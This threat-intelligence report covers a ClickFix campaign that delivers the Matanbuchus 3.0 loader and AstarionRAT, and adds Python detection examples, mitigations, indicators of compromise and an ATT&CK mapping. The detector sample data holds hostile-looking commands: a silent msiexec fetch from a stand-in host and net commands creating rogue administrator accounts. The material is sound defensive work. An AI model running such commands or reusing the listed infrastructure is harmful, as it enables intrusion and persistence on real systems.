First observed in February 2026, a sophisticated ClickFix social engineering campaign is actively targeting Windows users worldwide, tricking victims into unknowingly executing a silent MSI installation that delivers Matanbuchus 3.0 — a premium Malware-as-a-Service (MaaS) loader available for rent at up to $15,000 per month. Once the Matanbuchus 3.0 loader is deployed, it installs AstarionRAT, a newly identified remote access trojan (RAT) capable of credential theft, SOCKS5 proxying, network port scanning, and reflective payload loading. All command-and-control (C2) communications between AstarionRAT and its operators are protected through RSA encryption, making this Matanbuchus ClickFix attack campaign a significant and highly evasive threat to enterprise environments globally.
Stage 1 – ClickFix Social Engineering via Malicious MSI Installation
The Matanbuchus 3.0 campaign resurfaces after a brief hiatus in May 2025, now weaponizing ClickFix social engineering prompts to lure victims into pasting malicious commands into the Windows Run dialog. These commands use mixed-case formatting and obscured download paths to evade basic detection, retrieving a malicious installer from newly registered domains impersonating legitimate cloud services. Upon execution, the package drops files into AppData directories disguised as security software vendor folders and uses a renamed 7-Zip utility to unpack a password-protected archive containing the next-stage payload.

Stage 2 – DLL Sideloading and Matanbuchus 3.0 Loader Execution
The infection escalates through DLL sideloading, abusing legitimate antivirus components to execute malicious code under the cover of trusted software. A genuine executable is paired with a malicious DLL functioning as the Matanbuchus 3.0 loader. The loader is heavily obfuscated with binary padding, fake logic branches, and meaningless API calls designed to frustrate sandbox analysis. It decrypts embedded payloads using ChaCha20 encryption and reconstructs shellcode that bypasses monitoring controls before pulling the next module from attacker-controlled infrastructure.

Stage 3 – Java-Based Sideloading and In-Memory Reflective Loading
A second sideloading phase leverages legitimate Java components alongside a malicious library and an encrypted Lua script. The malware restores clean versions of key system libraries to neutralize security hooks, then launches an embedded Lua interpreter to decode large volumes of encoded data into executable shellcode. This shellcode acts as a reflective loader, rebuilding compressed components entirely in memory to deliver the final payload, AstarionRAT, while minimizing on-disk forensic artifacts.

Stage 4 – AstarionRAT Remote Access Trojan Deployment
AstarionRAT provides operators with full remote access capabilities including file and process manipulation, credential theft, command execution, network port scanning, SOCKS5 traffic proxying, and dynamic code loading. Its C2 communications are disguised as normal application telemetry to blend in with legitimate network activity. Persistence is established through scheduled tasks, and attackers returned approximately 17 hours after the initial compromise to begin manual hands-on operations.

Stage 5 – Lateral Movement, Rogue Account Creation, and Domain Expansion
During the hands-on phase, attackers conducted domain reconnaissance, staged tools in folders mimicking legitimate Windows update paths, and used a compromised service account to move laterally via RDP. Rogue administrator accounts were created and tooling was deployed across multiple servers, including a backup domain controller, effectively replicating access across the environment. While security defenses eventually quarantined portions of the attack chain, the operators retained persistence through newly created accounts until activity was ultimately contained.
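The sideloading shape described in Stages 1 and 2 (a genuine, signed vendor executable dropped into a vendor-looking AppData folder, loading an unsigned DLL that sits beside it) is detectable from image-load telemetry without knowing the specific binaries involved. The following is an added detection example written for this page, not code from the original report or from any vendor product. It assumes Sysmon Event ID 7 style fields (Image, ImageLoaded, signature status) that have been pre-parsed into dictionaries; the sample events are constructed, with only the AppData folder name borrowed from this report's IOC list, and the executable and DLL names are invented.

```python
import ntpath
import re

# Constructed image-load events shaped like Sysmon Event ID 7 records.
# The AppData folder name in the second event is taken from this report's
# IOC list; the executable and DLL file names are invented for the example.
SAMPLE_EVENTS = [
    {   # benign: signed vendor binary loads a signed DLL from Program Files
        "Image": r"C:\Program Files\ExampleAV\scanner.exe",
        "ImageLoaded": r"C:\Program Files\ExampleAV\engine.dll",
        "ImageSigned": True, "ImageLoadedSigned": True,
    },
    {   # suspicious: signed binary copied into a vendor-style AppData folder
        # loads an unsigned DLL from its own directory (sideloading shape)
        "Image": r"C:\Users\alice\AppData\Roaming\AegisLynx Cybernetics Ltd\AegisLynx Threat Fabric\AVU\scanner.exe",
        "ImageLoaded": r"C:\Users\alice\AppData\Roaming\AegisLynx Cybernetics Ltd\AegisLynx Threat Fabric\AVU\engine.dll",
        "ImageSigned": True, "ImageLoadedSigned": False,
    },
    {   # benign: unsigned developer tool loading its own unsigned DLL; no
        # signed host to abuse and not under a user profile
        "Image": r"C:\Tools\hexview\hexview.exe",
        "ImageLoaded": r"C:\Tools\hexview\plugins.dll",
        "ImageSigned": False, "ImageLoadedSigned": False,
    },
    {   # lower confidence: signed binary in Program Files loading an unsigned
        # side-by-side DLL (legitimate plugins look like this too)
        "Image": r"C:\Program Files\ExampleAV\updater.exe",
        "ImageLoaded": r"C:\Program Files\ExampleAV\plugin.dll",
        "ImageSigned": True, "ImageLoadedSigned": False,
    },
]

# User-writable profile locations the campaign dropped into (AppData\Roaming,
# AppData\Local and the Temp folder beneath it).
USER_WRITABLE = re.compile(r"\\appdata\\(roaming|local)\\", re.IGNORECASE)
# Company-style suffixes used to make a dropped folder look like a vendor's.
# Heuristic only: a folder literally named "inc" would also match.
VENDOR_SUFFIX = re.compile(r"\b(ltd|inc|gmbh|aps|s\.r\.l|llc)\b", re.IGNORECASE)


def analyse_event(event):
    """Return a list of finding strings for one image-load event."""
    findings = []
    # ntpath.normcase lowercases and normalises separators, so the same
    # directory compares equal regardless of how the sensor recorded it.
    image = ntpath.normcase(event["Image"])
    loaded = ntpath.normcase(event["ImageLoaded"])
    same_dir = ntpath.dirname(image) == ntpath.dirname(loaded)
    in_profile = bool(USER_WRITABLE.search(image))

    if same_dir and event["ImageSigned"] and not event["ImageLoadedSigned"]:
        # Signed host plus unsigned DLL from its own directory is the classic
        # sideload shape; running from a user profile raises the severity.
        severity = "high" if in_profile else "medium"
        findings.append(
            f"{severity}: possible DLL sideloading, {ntpath.basename(image)} "
            f"loaded unsigned {ntpath.basename(loaded)} from its own directory"
        )
    if in_profile and VENDOR_SUFFIX.search(image):
        findings.append(
            "medium: executable under a user profile in a vendor-style folder: "
            + ntpath.dirname(event["Image"])
        )
    return findings


def scan(events):
    """Return (image path, findings) for every event that produced findings."""
    results = []
    for event in events:
        findings = analyse_event(event)
        if findings:
            results.append((event["Image"], findings))
    return results


if __name__ == "__main__":
    for image, findings in scan(SAMPLE_EVENTS):
        print(image)
        for finding in findings:
            print("  -", finding)
```

Signature status alone is noisy (plenty of legitimate software ships unsigned plugins), which is why the example only raises the severity to high when the host binary runs from a user-writable profile path; in production the "medium" findings are better suited to hunting than to alerting.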
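C2 traffic that is "disguised as normal application telemetry" can still give itself away by its timing: a timer-driven implant checks in at near-constant intervals, whereas human-driven browsing and most cached asset fetches do not. The block below is an added example written for this page (it is not code from the report or from any product) that parses constructed proxy log lines, groups requests by client, host and URL path, and flags groups whose inter-request intervals have very low jitter. The destination host and the URI path on the flagged lines are taken from this report's IOC list; pairing them into one URL, the timestamps, the client address and the benign CDN traffic are all assumptions made for the example.

```python
import statistics
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Constructed proxy log lines: "<ISO timestamp> <client> <method> <url> <status>".
# Host and path on the POST lines come from this report's IOC list; the timing,
# client address and the cdn.example.net traffic are invented.
SAMPLE_LOG = """\
2026-02-10T09:00:00 10.1.2.3 POST http://www.ndibstersoft.com/intake/organizations/events?channel=app 200
2026-02-10T09:00:05 10.1.2.3 GET https://cdn.example.net/static/app.js 200
2026-02-10T09:01:00 10.1.2.3 POST http://www.ndibstersoft.com/intake/organizations/events?channel=app 200
2026-02-10T09:01:47 10.1.2.3 GET https://cdn.example.net/static/app.js 200
2026-02-10T09:02:01 10.1.2.3 POST http://www.ndibstersoft.com/intake/organizations/events?channel=app 200
2026-02-10T09:02:59 10.1.2.3 POST http://www.ndibstersoft.com/intake/organizations/events?channel=app 200
2026-02-10T09:03:10 10.1.2.3 GET https://cdn.example.net/static/app.js 304
2026-02-10T09:04:00 10.1.2.3 POST http://www.ndibstersoft.com/intake/organizations/events?channel=app 200
2026-02-10T09:05:00 10.1.2.3 POST http://www.ndibstersoft.com/intake/organizations/events?channel=app 200
2026-02-10T09:09:30 10.1.2.3 GET https://cdn.example.net/static/app.js 200
"""


def parse(log_text):
    """Turn log lines into (timestamp, client, host, path) tuples.
    The query string is dropped so that per-request parameters do not split
    one beacon channel into many groups."""
    events = []
    for line in log_text.splitlines():
        ts, client, _method, url, _status = line.split()
        parts = urlsplit(url)
        events.append((datetime.fromisoformat(ts), client, parts.hostname, parts.path))
    return events


def beacon_candidates(events, min_requests=5, max_jitter=0.10, max_interval=3600):
    """Return (key, mean interval seconds, jitter) for groups of requests whose
    spacing is nearly constant. Jitter is the population standard deviation of
    the gaps divided by their mean, so 0.0 is a perfect clock."""
    groups = defaultdict(list)
    for ts, client, host, path in events:
        groups[(client, host, path)].append(ts)

    hits = []
    for key, stamps in groups.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean == 0 or mean > max_interval:
            continue
        jitter = statistics.pstdev(gaps) / mean
        if jitter <= max_jitter:
            hits.append((key, round(mean, 1), round(jitter, 3)))
    return hits


if __name__ == "__main__":
    for (client, host, path), mean, jitter in beacon_candidates(parse(SAMPLE_LOG)):
        print(f"{client} -> {host}{path}: every {mean}s, jitter {jitter}")
```

Genuine telemetry agents also beacon on a schedule, so this check is a triage filter rather than a verdict: the useful follow-up is to allowlist known telemetry endpoints by host and to look at whether the destination domain is newly registered, which is exactly the property the delivery infrastructure in this campaign had.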
Train Users to Recognize ClickFix Prompts: Educate employees to identify and refuse prompts instructing them to copy and paste commands into Run dialogs or terminal windows. Users should understand the significant risks of executing unknown commands from web-based instructions — a hallmark of the ClickFix social engineering technique.
Disable the Windows Run Dialog via Group Policy: Use Group Policy to disable the Run dialog box (Win + R) and remove the Run option from the Start Menu via User Configuration > Administrative Templates > Start Menu and Taskbar to eliminate this key ClickFix execution path used by Matanbuchus 3.0.
Configure Terminal Paste Warnings: Set Windows Terminal to warn users when pasted text contains multiple lines, adding a critical speed bump before multi-line command execution that may indicate an active ClickFix social engineering attempt.
Monitor msiexec Execution with Suspicious Parameters: Configure endpoint detection rules to flag msiexec commands containing mixed-case characters, URLs with path traversal sequences, or the /q silent installation flag — especially when initiated from user-accessible contexts such as the Windows Run dialog.
Block Newly Registered Domains: Implement DNS filtering or proxy rules to block or flag connections to domains registered within the past 30 days. The ClickFix delivery infrastructure in this Matanbuchus campaign relied on domains created only days before the attack was launched.
Monitor Rogue Account Creation: Alert on net user and net localgroup commands adding unfamiliar accounts, especially when executed via PsExec or remote services, and flag accounts being added to Administrator groups in both English and localized variants (e.g., Administradores).
Implement Network Segmentation for Domain Controllers: Restrict direct RDP and PsExec access to domain controllers, requiring jump servers or privileged access workstations with multi-factor authentication to slow lateral movement toward these critical assets.
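Two of the recommendations above (monitoring msiexec for ClickFix-style parameters, and monitoring net user / net localgroup for rogue account creation, including localized administrator group names) translate directly into process-creation rules. The block below is an added example written for this page, not code from the report or from any EDR product. It assumes process events pre-parsed into dictionaries with Image, ParentImage and CommandLine fields, that a command launched from the Run dialog shows explorer.exe as its parent, and that remote service execution shows up under parents such as PSEXESVC.exe or services.exe; all sample events and the package URL are constructed, and the localized group names beyond Administradores (which the page names) are added from common Windows locales.

```python
import ntpath
import re

# msiexec indicators named in the recommendation above
SILENT_FLAG = re.compile(r"(?:^|\s)/q(?:n|b|r|f|uiet)?(?=\s|$)", re.IGNORECASE)
URL = re.compile(r"https?://\S+", re.IGNORECASE)
TRAVERSAL = re.compile(r"\.\./|\.\.\\|%2e%2e", re.IGNORECASE)

# Built-in Administrators group in English, Spanish (named on this page),
# French and German. Extend for the locales in your estate.
ADMIN_GROUPS = {"administrators", "administradores", "administrateurs", "administratoren"}
# Parents that indicate remote execution (PsExec service, SCM, WMI, WinRM)
REMOTE_EXEC_PARENTS = {"psexesvc.exe", "services.exe", "wmiprvse.exe", "winrshost.exe"}

# Constructed sample process-creation events; none are taken from the report.
SAMPLE_EVENTS = [
    {   # ClickFix-style: mixed-case binary name, silent flag, remote package
        # with a traversal sequence, launched from the Run dialog
        "Image": r"C:\Windows\System32\msiexec.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "MsIeXeC /q /I http://cloud-sync.example.test/../pkg/setup.msi",
    },
    {   # benign: management agent installing a cached local package silently
        "Image": r"C:\Windows\System32\msiexec.exe",
        "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
        "CommandLine": r'msiexec.exe /i "C:\Windows\ccmcache\a1\app.msi" /qn',
    },
    {   # rogue admin added to the Spanish-named group via PsExec
        "Image": r"C:\Windows\System32\net.exe",
        "ParentImage": r"C:\Windows\PSEXESVC.exe",
        "CommandLine": "net localgroup Administradores svc_backup /add",
    },
    {   # benign: just listing accounts
        "Image": r"C:\Windows\System32\net.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "net user",
    },
    {   # new local account created from a service context
        "Image": r"C:\Windows\System32\net1.exe",
        "ParentImage": r"C:\Windows\System32\services.exe",
        "CommandLine": "net1 user helpdesk2 P@ssw0rd! /add",
    },
]


def basename(path):
    return ntpath.basename(path.strip('"')).lower()


def is_mixed_case(token):
    return token != token.lower() and token != token.upper()


def check_msiexec(event):
    """Score msiexec launches; report on two or more indicators, or on any
    indicator when the launch came from the user's shell (Run dialog)."""
    if basename(event["Image"]) != "msiexec.exe":
        return []
    cmd = event["CommandLine"]
    tokens = cmd.split()
    indicators = []
    if any(is_mixed_case(t) for t in tokens
           if t.startswith("/") or basename(t) in ("msiexec", "msiexec.exe")):
        indicators.append("mixed-case executable or switch")
    if SILENT_FLAG.search(cmd):
        indicators.append("silent install flag")
    match = URL.search(cmd)
    if match:
        indicators.append("remote package URL")
        if TRAVERSAL.search(match.group(0)):
            indicators.append("path traversal in URL")
    from_shell = basename(event["ParentImage"]) == "explorer.exe"
    if indicators and (len(indicators) >= 2 or from_shell):
        context = "launched from user shell" if from_shell else "parent " + basename(event["ParentImage"])
        return [f"msiexec: {', '.join(indicators)}; {context}"]
    return []


def check_account_changes(event):
    """Flag net/net1 commands that add accounts or add members to Administrators."""
    tokens = event["CommandLine"].split()
    if not tokens or basename(tokens[0]) not in {"net", "net.exe", "net1", "net1.exe"}:
        return []
    lowered = [t.lower() for t in tokens]
    if "/add" not in lowered or len(tokens) < 3:
        return []
    remote = basename(event["ParentImage"]) in REMOTE_EXEC_PARENTS
    via = " via remote service execution" if remote else ""
    if lowered[1] == "user":
        return [f"local account created: {tokens[2]}{via}"]
    if lowered[1] == "localgroup" and lowered[2].strip('"') in ADMIN_GROUPS:
        member = tokens[3] if len(tokens) > 3 else "?"
        return [f"{member} added to administrators group ({tokens[2]}){via}"]
    return []


def scan(events):
    results = []
    for event in events:
        findings = check_msiexec(event) + check_account_changes(event)
        if findings:
            results.append((event["CommandLine"], findings))
    return results


if __name__ == "__main__":
    for cmdline, findings in scan(SAMPLE_EVENTS):
        print(cmdline, "->", "; ".join(findings))
```

The scoring keeps a lone /qn from a software-distribution agent quiet while still catching a single indicator when the parent is the user's shell, which is the context the ClickFix lure depends on. Group membership changes made through PowerShell or the Windows API do not pass through net.exe, so this rule should sit alongside Security event ID 4720 (account created) and 4732 (member added to a local group) monitoring rather than replace it.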
URLs:
hxxp[:]//binclloudapp[.]com/466943
hxxps[:]//marle[.]io/check/updprofile[.]aspx
Domain:
www[.]ndibstersoft[.]com
File Paths:
/intake/organizations/events?channel=app
%APPDATA%\AegisLynx Cybernetics Ltd\AegisLynx Threat Fabric\AVU
%APPDATA%\DocuRay Technologies S.r.l\DocuRay PDF Professional\ZAVY
%APPDATA%\HelixShield Technologies ApS\HelixShield Adaptive Security\APS\ZAV
%LOCALAPPDATA%\Temp\ndvyxgdriggmarrf\
SHA256 Hashes:
de81e2155d797ff729ed3112fd271aa2728e75fc71b023d0d9bb0f62663f33b3
6ffae128e0dbf14c00e35d9ca17c9d6c81743d1fc5f8dd4272a03c66ecc1ad1f
68858d3cbc9b8abaed14e85fc9825bc4fffc54e8f36e96ddda09e853a47e3e31
03c624d251e9143e1c8d90ba9b7fa1f2c5dc041507fd0955bdd4048a0967a829
8e54cd12591d67dfbe72e94c1bde6059e1cba157e6786aec63f8f9e3c71fb925
c31c8edbf94c85cc9bc46a5665c45a3556c48d5ad615c0a44e14e5406d80df12
eecc83add16f3d513a9701e9a646b1885014229ac6f86addd6b10afb64d1d2af
ea378496135318ac5ad667a032fa4a9686add9d27fe4a7c549c937611b5099e5
| Tactic | Technique | Sub-Technique |
|---|---|---|
| Execution | T1204: User Execution | T1204.002: Malicious File / T1204.004: Malicious Copy and Paste |
| Execution | T1059: Command and Scripting Interpreter | T1059.003: Windows Command Shell |
| Execution | T1218: System Binary Proxy Execution | T1218.007: Msiexec |
| Execution | T1106: Native API | — |
| Persistence | T1053: Scheduled Task/Job | T1053.005: Scheduled Task |
| Persistence | T1136: Create Account | T1136.001: Local Account |
| Privilege Escalation | T1078: Valid Accounts | T1078.003: Local Accounts |
| Defense Evasion | T1574: Hijack Execution Flow | T1574.001: DLL |
| Defense Evasion | T1027: Obfuscated Files or Information | T1027.001: Binary Padding / T1027.013: Encrypted/Encoded File |
| Defense Evasion | T1562: Impair Defenses | T1562.001: Disable or Modify Tools |
| Defense Evasion | T1036: Masquerading | T1036.005: Match Legitimate Name or Location |
| Defense Evasion | T1620: Reflective Code Loading | — |
| Discovery | T1069: Permission Groups Discovery | T1069.002: Domain Groups |
| Discovery | T1018: Remote System Discovery | — |
| Lateral Movement | T1021: Remote Services | T1021.001: Remote Desktop Protocol |
| Lateral Movement | T1570: Lateral Tool Transfer | — |
| Lateral Movement | T1569: System Services | T1569.002: Service Execution |
| Command and Control | T1071: Application Layer Protocol | T1071.001: Web Protocols |
| Command and Control | T1573: Encrypted Channel | T1573.002: Asymmetric Cryptography |
| Command and Control | T1090: Proxy | T1090.001: Internal Proxy |
| Command and Control | T1132: Data Encoding | T1132.002: Non-Standard Encoding |